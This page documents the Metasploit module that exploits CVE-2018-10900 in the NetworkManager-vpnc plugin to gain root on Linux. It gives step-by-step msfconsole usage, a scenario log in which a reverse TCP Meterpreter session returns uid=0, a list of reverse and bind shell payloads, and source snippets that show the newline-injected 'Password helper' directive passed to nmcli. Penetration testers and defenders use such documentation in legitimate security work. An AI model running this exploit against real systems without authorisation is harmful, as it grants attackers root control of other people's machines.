Network Manager VPNC Username Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/network_manager_vpnc_username_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Network Manager VPNC Username Privilege Escalation
Module: exploit/linux/local/network_manager_vpnc_username_priv_esc
Source code: modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb
Disclosure date: 2018-07-26
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-10900

This module exploits an injection vulnerability in the Network Manager VPNC plugin to gain root privileges. This module uses a new line injection vulnerability in the configured username for a VPN network connection to inject a Password helper configuration directive into the connection configuration. The specified helper is executed by Network Manager as root when the connection is started. Network Manager VPNC versions prior to 1.2.6 are vulnerable. This module has been tested successfully with VPNC versions: 1.2.4-4 on Debian 9.0.0 (x64); and 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/network_manager_vpnc_username_priv_esc
msf exploit(network_manager_vpnc_username_priv_esc) > show targets
    ... a list of targets ...
msf exploit(network_manager_vpnc_username_priv_esc) > set TARGET target-id
msf exploit(network_manager_vpnc_username_priv_esc) > show options
    ... show and set options ...
msf exploit(network_manager_vpnc_username_priv_esc) > set SESSION session-id
msf exploit(network_manager_vpnc_username_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


Description

This module exploits an injection vulnerability in the Network Manager VPNC plugin to gain root privileges.

This module uses a new line injection vulnerability in the configured username for a VPN network connection to inject a Password helper configuration directive into the connection configuration.

The specified helper is executed by Network Manager as root when the connection is started.

Network Manager VPNC versions prior to 1.2.6 are vulnerable.

This module has been tested successfully with VPNC versions:

  • 1.2.4-4 on Debian 9.0.0 (x64); and
  • 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).

Installation

The following installation instructions are for Ubuntu 16.04.04.

  # List available network-manager-vpnc packages
  apt-cache showpkg network-manager-vpnc

  # Install a vulnerable package
  apt-get install network-manager-vpnc=1.1.93-1

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/network_manager_vpnc_username_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: run
  6. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc 
  msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 
  lhost => 172.16.191.188
  msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [+] nmcli utility is installed
  [*] Adding VPN connection...
  [*] Uploading payload...
  [*] Writing '/tmp/.4FCA0Pp4tw' (237 bytes) ...
  [*] Starting VPN connection...
  [*] Transmitting intermediate stager...(106 bytes)
  [*] Sending stage (861480 bytes) to 172.16.191.201
  [+] Deleted /tmp/.4FCA0Pp4tw
  [*] Removing VPN connection...

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.201
  OS           : Ubuntu 16.04 (Linux 4.13.0-41-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the linux/local/network_manager_vpnc_username_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/network_manager_vpnc_username_priv_esc

[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/network_manager_vpnc_username_priv_esc) > show info

       Name: Network Manager VPNC Username Privilege Escalation
     Module: exploit/linux/local/network_manager_vpnc_username_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2018-07-26

Provided by:
  Denis Andzakovic
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module exploits an injection vulnerability in the Network 
  Manager VPNC plugin to gain root privileges. This module uses a new 
  line injection vulnerability in the configured username for a VPN 
  network connection to inject a `Password helper` configuration 
  directive into the connection configuration. The specified helper is 
  executed by Network Manager as root when the connection is started. 
  Network Manager VPNC versions prior to 1.2.6 are vulnerable. This 
  module has been tested successfully with VPNC versions: 1.2.4-4 on 
  Debian 9.0.0 (x64); and 1.1.93-1 on Ubuntu Linux 16.04.4 (x64).

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-10900
  https://seclists.org/oss-sec/2018/q3/51
  https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
  https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4
  https://security-tracker.debian.org/tracker/CVE-2018-10900
  https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html
  https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1
  https://www.debian.org/security/2018/dsa-4253
  https://bugzilla.redhat.com/show_bug.cgi?id=1605919
  https://bugzilla.novell.com/show_bug.cgi?id=1101147

Module Options


This is a complete list of options available in the linux/local/network_manager_vpnc_username_priv_esc exploit:

msf6 exploit(linux/local/network_manager_vpnc_username_priv_esc) > show options

Module options (exploit/linux/local/network_manager_vpnc_username_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/network_manager_vpnc_username_priv_esc exploit:

msf6 exploit(linux/local/network_manager_vpnc_username_priv_esc) > show advanced

Module advanced options (exploit/linux/local/network_manager_vpnc_username_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x86/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  true             no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/network_manager_vpnc_username_priv_esc module can exploit:

msf6 exploit(linux/local/network_manager_vpnc_username_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/network_manager_vpnc_username_priv_esc exploit:

msf6 exploit(linux/local/network_manager_vpnc_username_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/network_manager_vpnc_username_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/network_manager_vpnc_username_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Network Manager nmcli utility is not installed


Here is a relevant code snippet related to the "Network Manager nmcli utility is not installed" error message:

85:	    cmd_exec "chmod +x '#{path}'"
86:	  end
87:	
88:	  def check
89:	    unless command_exists? 'nmcli'
90:	      vprint_error 'Network Manager nmcli utility is not installed'
91:	      return CheckCode::Safe
92:	    end
93:	    vprint_good 'nmcli utility is installed'
94:	
95:	    CheckCode::Detected

Session already has root privileges. Set ForceExploit to override.


Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

96:	  end
97:	
98:	  def exploit
99:	    if is_root?
100:	      unless datastore['ForceExploit']
101:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
102:	      end
103:	    end
104:	
105:	    @payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
106:	    payload_path = "#{base_dir}/#{@payload_name}"

Error


Here is a relevant code snippet related to the "Error" error message:

118:	    vpn_data << '+vpn.data "Xauth password-flags = 4"'
119:	    vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
120:	    vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
121:	    vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
122:	    res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
123:	    if res.include? 'Error'
124:	      fail_with Failure::Unknown, 'Could not create VPN connection'
125:	    end
126:	
127:	    res = cmd_exec 'nmcli connection'
128:	    unless res.include? @payload_name

Could not create VPN connection


Here is a relevant code snippet related to the "Could not create VPN connection" error message:

119:	    vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
120:	    vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
121:	    vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
122:	    res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}"
123:	    if res.include? 'Error'
124:	      fail_with Failure::Unknown, 'Could not create VPN connection'
125:	    end
126:	
127:	    res = cmd_exec 'nmcli connection'
128:	    unless res.include? @payload_name
129:	      fail_with Failure::Unknown, 'Could not create VPN connection'

Could not create VPN connection


Here is a relevant code snippet related to the "Could not create VPN connection" error message:

124:	      fail_with Failure::Unknown, 'Could not create VPN connection'
125:	    end
126:	
127:	    res = cmd_exec 'nmcli connection'
128:	    unless res.include? @payload_name
129:	      fail_with Failure::Unknown, 'Could not create VPN connection'
130:	    end
131:	
132:	    print_status 'Uploading payload...'
133:	    upload_and_chmodx payload_path, generate_payload_exe
134:	

Could not remove VPN connection <PAYLOAD_NAME>


Here is a relevant code snippet related to the "Could not remove VPN connection <PAYLOAD_NAME>" error message:

137:	  end
138:	
139:	  def cleanup
140:	    print_status 'Removing VPN connection...'
141:	    res = cmd_exec "nmcli connection delete #{@payload_name}"
142:	    unless res.include? 'successfully deleted'
143:	      print_warning "Could not remove VPN connection #{@payload_name}"
144:	    end
145:	    super
146:	  end
147:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Denis Andzakovic
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.